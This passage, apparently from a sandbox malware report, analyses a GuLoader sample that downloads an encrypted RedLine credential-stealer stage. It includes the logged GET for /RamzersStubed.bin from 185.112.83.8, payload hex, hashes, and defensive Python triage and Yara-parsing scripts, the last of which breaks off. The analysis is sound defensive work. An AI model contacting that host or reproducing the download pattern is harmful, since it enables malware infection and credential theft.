RT_GROUP_ICON | 0x4c838 | 0x14 | data | English | United States
RT_VERSION | 0x4c850 | 0x2b4 | data | English | United States
RT_MANIFEST | 0x4cb08 | 0x33e | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Version Infos

Description | Data
LegalCopyright | Asilum
FileVersion | 1.2.3
CompanyName | Asilum company
LegalTrademarks | Asilum is a trademark of Asilum company
Comments | Asilum
ProductName | Asilum Application
FileDescription | Asilum Application
Translation | 0x0409 0x04b0

                                                                                                                                                Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                                                                                                                                                Network Behavior

                                                                                                                                                Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
12/18/21-08:26:53.364210 | TCP | 2018752 | ET TROJAN Generic .bin download from Dotted Quad | 49798 | 80 | 192.168.2.3 | 185.112.83.8

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2021 08:26:53.308614969 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.362879992 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.363086939 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.364209890 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.418927908 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.418976068 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.419004917 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.419029951 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.419059992 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.419112921 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.419131994 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.419171095 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.419210911 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.419246912 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.419275999 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.419286966 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.419326067 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.419363022 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.419384003 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.419420004 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.419434071 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.420488119 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.474041939 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474103928 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474136114 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474165916 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474196911 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474236012 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474272966 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474311113 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474348068 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474385977 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474406004 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.474457026 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474467993 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.474507093 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474524021 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.474562883 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474581003 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.474617958 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474663019 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474673033 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.474710941 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.474752903 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474767923 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.474805117 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474858046 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474869013 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.474909067 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.474937916 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.474968910 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.475023031 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.475090027 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.529712915 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.529763937 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.529803991 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.529844046 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.529880047 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.529920101 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.529958963 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.529979944 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.530023098 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.530042887 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.530083895 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.530121088 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.530142069 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.530189037 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.530201912 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.530241013 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.530257940 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.530294895 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.530313969 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.530352116 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.530369997 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.530407906 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.530426979 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.530472994 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.530484915 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.530512094 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.530539989 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.530576944 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.530596972 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.530615091 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.530653000 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.530689955 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.530709028 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.530728102 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.530766010 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.530783892 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.530822992 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.530843019 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.530880928 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.530900002 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.530939102 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.530956030 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.530993938 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.531013012 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.531050920 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3
Dec 18, 2021 08:26:53.531069040 CET | 49798 | 80 | 192.168.2.3 | 185.112.83.8
Dec 18, 2021 08:26:53.531106949 CET | 80 | 49798 | 185.112.83.8 | 192.168.2.3

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • 185.112.83.8

                                                                                                                                                HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49798 | 185.112.83.8 | 80 | C:\Users\user\Desktop\GR8jRQeRUr.exe
Timestamp | kBytes transferred | Direction | Data
Dec 18, 2021 08:26:53.364209890 CET | 10477 | OUT | GET /RamzersStubed.bin HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                Host: 185.112.83.8
                                                                                                                                                Cache-Control: no-cache
Dec 18, 2021 08:26:53.418927908 CET | 10479 | IN | HTTP/1.1 200 OK
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Last-Modified: Fri, 17 Dec 2021 11:50:50 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                ETag: "425781563cf3d71:0"
                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                Date: Sat, 18 Dec 2021 07:26:49 GMT
                                                                                                                                                Content-Length: 190016
                                                                                                                                                Data Raw: 3c b8 df aa d5 24 18 4b 00 7c 20 bc 99 ab 4c bd cb dd 92 5d fb 30 6b 55 fc 10 13 eb 85 8a bd f7 3e dc 6f 1d dc 42 51 7c d2 39 2d b7 bf 40 ab fa 75 9c b4 48 eb 92 39 1c 82 89 36 23 5e 56 75 77 33 18 04 85 68 69 41 92 39 b4 cb eb 5e 8c 12 df 3f ed 01 57 e9 f0 7c e9 90 c8 2b 3f 5f 69 32 39 2c 89 3c 73 4a 8b 19 e5 b6 fa ad 09 5a d5 5a 20 30 01 5f 10 89 1a f1 0d 65 b3 b7 3c 54 6f c7 f1 2b f1 2d 3a 29 5e b3 ee ca 06 74 9f 76 94 8c fd af a5 4c eb 39 0a 7b 43 b3 5b ea f3 4a da 5d 94 ac 92 9c 3d 76 be 67 9b cb c1 8a ab 1b 76 ca d8 da b7 9f 8a 47 87 a8 b5 10 83 a2 9c 41 f3 ac 3f d6 ef d6 5a f9 70 d8 b3 87 db 69 ec 39 48 f3 51 44 21 89 25 ca 24 f1 07 6c 95 b1 1f 8a 73 be 4e 01 c8 c6 30 2b 2f bf 8b 39 c8 4c 09 7c e3 8c ba d3 e7 d2 9b 28 27 2c 6d e8 44 5e bf a6 5a 92 ab ac d5 54 4f f7 a5 d1 7b 9f c1 6b 30 02 a1 19 48 39 da 2c df e1 bc 9c 27 23 4d 7b 71 5a 01 0d 72 69 ee 5d 25 c7 fd 75 f3 2d 1a f4 84 b9 8e 64 35 eb 74 eb 11 5e f2 74 52 c6 73 e9 45 30 a2 91 f8 a9 4c cc f1 1f f1 e0 a3 84 d1 aa bf 3d 02 f9 c7 ae 77 b2 86 d0 bc ab fd 9b d6 1e d7 2b 15 4b 5b a8 f4 8f 35 4d 07 67 7f 5f cc a6 42 91 d4 83 e6 38 43 98 ea 66 ca bc a1 f0 69 d1 f3 18 81 09 e3 3f ba 2c 41 8f 04 af 03 4c 2b 3d 9d a7 5c e6 d6 87 e7 f6 44 bd 04 40 28 d5 69 45 60 c3 80 00 2b 2d b0 35 a0 d6 50 a3 a2 b0 aa fc b1 65 5a aa 5f 92 77 07 22 71 fc 5d ea 08 c0 b2 58 e8 34 bf 16 51 ff ba ca dd 23 9e ba de 83 b8 1c 4c fd c3 1b f4 d0 b5 ad a3 09 d5 28 9a 8c 94 b6 75 e7 3f 7e 29 c6 a0 e3 6c 86 62 92 46 7d c8 f9 b0 a2 ad fb 2f ed b1 3a d6 e7 3a 18 35 f8 15 b7 45 b3 d8 ad 84 c0 d7 0d 27 57 8d 65 b0 71 75 5e 8d 80 82 4a a1 1e 77 c1 70 5e 62 43 1f 86 00 c7 19 3b d7 d0 70 07 b4 7b 88 29 c0 96 aa c9 4d 2c ee 30 4a 9f 52 ad 71 35 07 7f 2d c5 6d 02 a4 57 13 f9 5f 5a e5 4d 0c 70 f8 6e 5a 43 b0 84 94 f0 c5 1e b9 6b ef 07 0c 96 48 33 8d a1 56 d6 a8 2e 69 62 27 8c 76 8b 06 b0 63 8c b3 
b3 72 04 a8 a8 a2 5a 80 61 d9 61 a7 5b 71 09 ba b4 92 88 0b 3d 6d 63 fc bb 22 96 39 c5 4f db fd c1 23 16 f4 80 0d 82 86 d0 01 25 03 f4 62 1c 5e ec 83 bf ea b9 14 88 40 d8 55 a3 5b 27 4e fb d5 39 34 e2 df db ea 24 85 0f 0c 2a ab 2d 9f a1 40 6e 30 41 8e 2d ce 90 74 cf d8 c7 04 dc a7 ba ac 7f 9e ab 70 5f c5 7e 01 a0 38 1e b1 fe f0 83 fc 95 cd 83 d9 69 c7 51 82 ce 1f 9f 9a ac 7b d2 fd db dd 84 a6 6b 2f 5f c3 65 15 27 4e 33 f3 58 d4 7b 14 5a 8a 2d d3 34 98 92 4f 6e 63 d0 80 c5 1c f1 c4 17 de 20 c0 08 6b ab 34 e4 c3 a6 7f 66 04 39 56 11 b2 e8 4c c7 bb ec fb 02 1c d1 87 28 59 b0 b8 2d fa 19 5d 30 7a 2a 66 ad c2 54 98 76 73 c5 48 09 88 92 23 a6 8b 62 da db 4d 86 5f 7e 42 94 85 6b 69 41 92 3d b4 cb eb a1 73 12 df 87 ed 01 57 e9 f0 7c e9 d0 c8 2b 3f 5f 69 32 39 2c 89 3c 73 4a 8b 19 e5 b6 fa ad 09 5a d5 5a 20 30 01 5f 10 89 1a f1 0d 65 b3 b7 3c b4 6f c7 f1 25 ee 97 34 29 ea ba 23 eb be 75 d3 bb b5 d8 95 c6 d6 6c 9b 4b 65 1c 31 d2 36 ca 90 2b b4 33 fb d8 b2 fe 58 56 cc 12 f5 eb a8 e4 8b 5f 39 99 f8 b7 d8 fb ef 69 8a a5 bf 34 83 a2 9c 41 f3 ac 3f be ff 52 77 d5 01 32 cd ab aa 83 92 15 39 19 2f 76 02 f6 5b f5 55 1b 79 67 22 20 61 a1 02 54 30 2d b9 2d 4e 77 5e 55 f5 0b eb 22 77 60 92 66 c4 e1 c4 bb e5 8a 56 c6 13 da 67 25 c1 8b 2b 78 d5 fe bc 37 27 db d4 3b 05 9f c1 6b 30 02 a1 19 48 39 da 2c df e1 bc 9c 27 d5 e8 52 e1 5a 01 0d 72 39 ab 5d 25 8b fc 71 f3 59 bf f4 d4 b9 8e 64 35 eb 74 eb 11 be f2 57 53 cd 72 e0 ce 74 1e 94 d5 a7 06
                                                                                                                                                Data Ascii: <$K| L]0kU>oBQ|9-@uH96#^Vuw3hiA9^?W|+?_i29,<sJZZ 0_e<To+-:)^tvL9{C[J]=vgvGA?Zpi9HQD!%$lsN0+/9L|(',mD^ZTO{k0H9,'#M{qZri]%u-d5t^tRsE0L=w+K[5Mg_B8Cfi?,AL+=\D@(iE`+-5PeZ_w"q]X4Q#L(u?~)lbF}/::5E'Wequ^Jwp^bC;p{)M,0JRq5-mW_ZMpnZCkH3V.ib'vcrZaa[q=mc"9O#%b^@U['N94$*-@n0A-tp_~8iQ{k/_e'N3X{Z-4Onc k4f9VL(Y-]0z*fTvsH#bM_~BkiA=sW|+?_i29,<sJZZ 0_e<o%4)#ulKe16+3XV_9i4A?Rw29/v[Uyg" aT0--Nw^U"w`fVg%+x7';k0H9,'RZr9]%qYd5tWSrt
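The exchange above is the whole network story of this run: one GET for /RamzersStubed.bin to a bare IP, sent by GR8jRQeRUr.exe with an Internet Explorer 11 User-Agent, answered with a 200 application/octet-stream of 190016 bytes whose first bytes (3c b8 df aa ...) are not an MZ header, which is what an encrypted second stage looks like on the wire. The script below is an added example, not code from the report or from Joe Sandbox: it takes the request and response heads printed above plus the first 16 bytes of the Data Raw dump, and scores the pair with heuristics that mirror the conditions the Snort message on this page names (a .bin fetched from a dotted quad) together with the other tells a practitioner would check. The indicator names, the three-indicator threshold and the benign comparison request are this example's own assumptions, and the logic is not the text of ET signature 2018752.

```python
"""Triage of the captured HTTP exchange for a loader-style payload download.

Added example, not code from the report or from Joe Sandbox. REQUEST and
RESPONSE are copied from the report's HTTP Packets section; BODY_PREFIX is
the first 16 bytes of its Data Raw dump. The heuristics are this example's
own, not the text of ET rule 2018752.
"""
import ipaddress

REQUEST = (
    "GET /RamzersStubed.bin HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Host: 185.112.83.8\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)

RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Last-Modified: Fri, 17 Dec 2021 11:50:50 GMT\r\n"
    "Accept-Ranges: bytes\r\n"
    'ETag: "425781563cf3d71:0"\r\n'
    "Server: Microsoft-IIS/10.0\r\n"
    "Date: Sat, 18 Dec 2021 07:26:49 GMT\r\n"
    "Content-Length: 190016\r\n"
    "\r\n"
)

# First 16 bytes of the response body as printed in the report's Data Raw dump.
BODY_PREFIX = bytes.fromhex("3c b8 df aa d5 24 18 4b 00 7c 20 bc 99 ab 4c bd")

# Process that owned the socket, from the HTTP Packets session row.
CLIENT_PROCESS = r"C:\Users\user\Desktop\GR8jRQeRUr.exe"


def parse_message(raw):
    """Split an HTTP/1.1 head into (start line, {lower-cased header name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    start, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start, headers


def is_ip_literal(host):
    """True when the Host header is a bare IPv4 address, with or without a port."""
    name = host.rsplit(":", 1)[0] if host.count(":") == 1 else host
    try:
        ipaddress.IPv4Address(name)
    except ValueError:
        return False
    return True


def triage(request, response, body_prefix, client_process):
    """Return the indicators that fired and a verdict for one request/response pair."""
    req_line, req = parse_message(request)
    method, path, _ = req_line.split(" ", 2)
    status_line, resp = parse_message(response)
    status = int(status_line.split(" ", 2)[1])

    hits = []
    if method == "GET" and is_ip_literal(req.get("host", "")):
        hits.append("host_is_ip_literal")          # no DNS name, no certificate
    if path.lower().endswith(".bin"):
        hits.append("bin_uri")                      # opaque blob requested by name
    if "referer" not in req:
        hits.append("no_referer")                   # not a click-through from a page
    ua = req.get("user-agent", "").lower()
    if "trident/7.0" in ua and not client_process.lower().endswith("iexplore.exe"):
        hits.append("browser_ua_from_non_browser")  # IE11 UA sent by GR8jRQeRUr.exe
    binary = resp.get("content-type", "").startswith("application/octet-stream")
    if status == 200 and binary:
        hits.append("octet_stream_200")
    if binary and body_prefix and not body_prefix.startswith(b"MZ"):
        hits.append("body_lacks_pe_header")         # encrypted stage, not a plain PE

    return {
        "uri": path,
        "host": req.get("host"),
        "content_length": int(resp.get("content-length", "0")),
        "hits": hits,
        # Threshold assumed by this example: three independent indicators.
        "suspicious": len(hits) >= 3,
    }


if __name__ == "__main__":
    print(triage(REQUEST, RESPONSE, BODY_PREFIX, CLIENT_PROCESS))
```

The missing MZ header is the detail worth keeping: the file on disk is only the loader, and the 190016-byte blob is decrypted in memory (consistent with the GuLoader Yara match listed under System Behavior below), so the URL path, the host 185.112.83.8 and the ETag are more durable pivots than a hash of the downloaded bytes.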


                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                Behavior

                                                                                                                                                System Behavior

                                                                                                                                                General

Start time: 08:24:56
Start date: 18/12/2021
Path: C:\Users\user\Desktop\GR8jRQeRUr.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\GR8jRQeRUr.exe"
Imagebase: 0x400000
File size: 96104 bytes
MD5 hash: 30A35B83C44ABA13EE4EA4EE11003419
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Author: Joe Security
Reputation: low

                                                                                                                                                General

                                                                                                                                                Start time:08:25:56
                                                                                                                                                Start date:18/12/2021
                                                                                                                                                Path:C:\Users\user\Desktop\GR8jRQeRUr.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\GR8jRQeRUr.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:96104 bytes
                                                                                                                                                MD5 hash:30A35B83C44ABA13EE4EA4EE11003419
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.590456261.000000001E680000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000000.404230350.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.591069977.000000001E985000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
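The two process blocks above share the same path and command line, yet the first is flagged only as GuLoader while the second carries GuLoader in its initial dump and RedLine plus a credential stealer in its final dumps, which is how a loader that decrypts its payload in place shows up in a memory-dump listing. The parser below, added here as an example and not part of the Joe Sandbox report, reads such process blocks and groups the Yara hits by process so that the loader-plus-payload overlap and the RWX regions are easy to spot. It assumes the dump-name layout `<process index>.<stage>.<id>.<address>.<protection>.<type>.sdmp` and that the protection field holds Windows `PAGE_*` constants; neither is stated on the page. The input is an excerpt of the page's own blocks, embedded as a constructed string.

```python
"""Parse sandbox process blocks and their Yara match lines (added example)."""
import re
from collections import defaultdict

# Assumption: the fifth dump-name field is a Windows page protection value.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
}

# Assumed layout: process.stage.id.address.protection.type.sdmp (all hex except id).
DUMP_RE = re.compile(
    r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$")
MATCH_RE = re.compile(
    r"Rule:\s*(\S+?),\s*Description:\s*(.*?),\s*Source:\s*(\S+?),\s*Author:\s*(.+)$")

# Constructed input: an excerpt of the process blocks from the report above.
REPORT = r"""
General
Start time:08:24:56
Path:C:\Users\user\Desktop\GR8jRQeRUr.exe
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Author: Joe Security
General
Start time:08:25:56
Path:C:\Users\user\Desktop\GR8jRQeRUr.exe
Programmed in:.Net C# or VB.NET
Yara matches:
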